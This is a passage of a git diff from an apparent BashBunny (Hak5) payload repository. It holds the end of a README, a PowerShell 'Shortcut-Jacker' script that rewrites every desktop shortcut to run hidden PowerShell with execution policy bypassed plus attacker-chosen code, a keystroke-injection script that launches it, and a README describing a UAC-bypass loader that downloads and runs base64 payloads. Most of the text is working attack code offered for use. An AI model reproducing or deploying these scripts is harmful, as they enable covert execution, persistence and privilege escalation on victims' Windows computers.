<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<h2 align="center">📱 My Socials 📱</h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
|
||||
</a>
|
||||
<br>YouTube
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://twitter.com/I_Am_Jakoby">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
|
||||
</a>
|
||||
<br>Twitter
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://discord.gg/MYYER2ZcJF">
|
||||
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
|
||||
</a>
|
||||
<br>Discord
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="https://raw.githubusercontent.com/bornmay/bornmay/Update/svg/Bottom.svg" alt="Github Stats" />
|
||||
</p>
|
|
@ -0,0 +1,118 @@
|
|||
############################################################################################################################################################
|
||||
# | ___ _ _ _ # ,d88b.d88b #
|
||||
# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
|
||||
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
|
||||
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
|
||||
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
|
||||
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
|
||||
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
|
||||
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
|
||||
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
|
||||
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
|
||||
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
|
||||
# # / \ / ~ \ #
|
||||
# github.com/I-Am-Jakoby # \ / \~ ~/ #
|
||||
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
|
||||
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
|
||||
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
This is payload used to inject powershell code into shortcuts
|
||||
|
||||
.DESCRIPTION
|
||||
This payload will gather information on the shortcuts on your targets desktop
|
||||
That data will then be manipulated to embed a powershell script
|
||||
This script will be ran in the background when the short cut is
|
||||
|
||||
#>
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
<#
|
||||
.NOTES
|
||||
The powershell code stored in this variable is what will run in the background
|
||||
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
|
||||
variable and it will still run.
|
||||
#>
|
||||
|
||||
$code = "Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')"
|
||||
|
||||
############################################################################################################################################################
|
||||
|
||||
function Get-Shortcut {
|
||||
param(
|
||||
$path = $null
|
||||
)
|
||||
|
||||
$obj = New-Object -ComObject WScript.Shell
|
||||
|
||||
if ($path -eq $null) {
|
||||
$pathUser = [System.Environment]::GetFolderPath('StartMenu')
|
||||
$pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')
|
||||
$path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse
|
||||
}
|
||||
if ($path -is [string]) {
|
||||
$path = dir $path -Filter *.lnk
|
||||
}
|
||||
$path | ForEach-Object {
|
||||
if ($_ -is [string]) {
|
||||
$_ = dir $_ -Filter *.lnk
|
||||
}
|
||||
if ($_) {
|
||||
$link = $obj.CreateShortcut($_.FullName)
|
||||
|
||||
$info = @{}
|
||||
$info.Hotkey = $link.Hotkey
|
||||
$info.TargetPath = $link.TargetPath
|
||||
$info.LinkPath = $link.FullName
|
||||
$info.Arguments = $link.Arguments
|
||||
$info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}
|
||||
$info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}
|
||||
$info.WindowStyle = $link.WindowStyle
|
||||
$info.IconLocation = $link.IconLocation
|
||||
|
||||
return $info
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
function Set-Shortcut {
|
||||
param(
|
||||
[Parameter(ValueFromPipelineByPropertyName=$true)]
|
||||
$LinkPath,
|
||||
$IconLocation,
|
||||
$Arguments,
|
||||
$TargetPath
|
||||
)
|
||||
begin {
|
||||
$shell = New-Object -ComObject WScript.Shell
|
||||
}
|
||||
|
||||
process {
|
||||
$link = $shell.CreateShortcut($LinkPath)
|
||||
|
||||
$PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |
|
||||
Where-Object { $_.key -ne 'LinkPath' } |
|
||||
ForEach-Object { $link.$($_.key) = $_.value }
|
||||
$link.Save()
|
||||
}
|
||||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
function hijack{
|
||||
$Link = $i.LinkPath
|
||||
$Loc = $i.IconLocation
|
||||
$TargetPath = $i.TargetPath
|
||||
if($Loc.length -lt 4){$Loc = "$TargetPath$Loc"}
|
||||
$Target = $i.Target
|
||||
if(Test-Path -Path "$Link" -PathType Leaf){Set-Shortcut -LinkPath "$Link" -IconLocation "$Loc" -Arguments "-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code" -TargetPath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
|
||||
}
|
||||
|
||||
#-----------------------------------------------------------------------------------------------------------
|
||||
|
||||
Get-ChildItem –Path "$Env:USERPROFILE\Desktop" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}
|
|
@ -0,0 +1,20 @@
|
|||
REM Title: Shortcut-Jacker
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
GET SWITCH_POSITION
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
LED STAGE1
|
||||
|
||||
QUACK DELAY 3000
|
||||
QUACK GUI r
|
||||
QUACK DELAY 100
|
||||
LED STAGE2
|
||||
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Shortcut-Jacker.ps1')"
|
||||
QUACK ENTER
|
|
@ -0,0 +1,104 @@
|
|||
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
|
||||
|
||||
<!-- TABLE OF CONTENTS -->
|
||||
<details>
|
||||
<summary>Table of Contents</summary>
|
||||
<ol>
|
||||
<li><a href="#Description">Description</a></li>
|
||||
<li><a href="#getting-started">Getting Started</a></li>
|
||||
<li><a href="#Contributing">Contributing</a></li>
|
||||
<li><a href="#Version-History">Version History</a></li>
|
||||
<li><a href="#Contact">Contact</a></li>
|
||||
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
||||
</ol>
|
||||
</details>
|
||||
|
||||
# UrAttaControl
|
||||
|
||||
A script used to open an elevated powershell console and execute admin level commands
|
||||
|
||||
## Description
|
||||
|
||||
Completely ran from the execute file. Replace the URL in that file with yours leading to a base64 script
|
||||
|
||||
This script will use IEX to download a base64 script to the $Payload variable
|
||||
|
||||
Using a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64
|
||||
|
||||
script saved in the $Payload variable
|
||||
|
||||
This payload completely bypasses the UAC and will run any admin level script without a prompt
|
||||
|
||||
You can use this function I wrote to convert your .ps1 sscripts to Base64
|
||||
|
||||
https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* DropBox or other file sharing service - Your Shared link for the intended file
|
||||
* Windows 10,11
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* A keystroke injection based payload will run
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Contributing
|
||||
|
||||
All contributors names will be listed here
|
||||
|
||||
I am Jakoby
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
## Version History
|
||||
|
||||
* 0.1
|
||||
* Initial Release
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- CONTACT -->
|
||||
## Contact
|
||||
|
||||
<div><h2>I am Jakoby</h2></div>
|
||||
<p><br/>
|
||||
|
||||
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
|
||||
|
||||
<a href="https://github.com/I-Am-Jakoby/">
|
||||
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.instagram.com/i_am_jakoby/">
|
||||
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
|
||||
</a>
|
||||
|
||||
<a href="https://twitter.com/I_Am_Jakoby/">
|
||||
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
|
||||
</a>
|
||||
|
||||
<a href="https://www.youtube.com/c/IamJakoby/">
|
||||
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
|
||||
</a>
|
||||
|
||||
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-UrAttaControl)
|
||||
</p>
|
||||
|
||||
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|
||||
|
||||
<!-- ACKNOWLEDGMENTS -->
|
||||
## Acknowledgments
|
||||
|
||||
* [Hak5](https://hak5.org/)
|
||||
* [MG](https://github.com/OMG-MG)
|
||||
|
||||
<p align="right">(<a href="#top">back to top</a>)</p>
|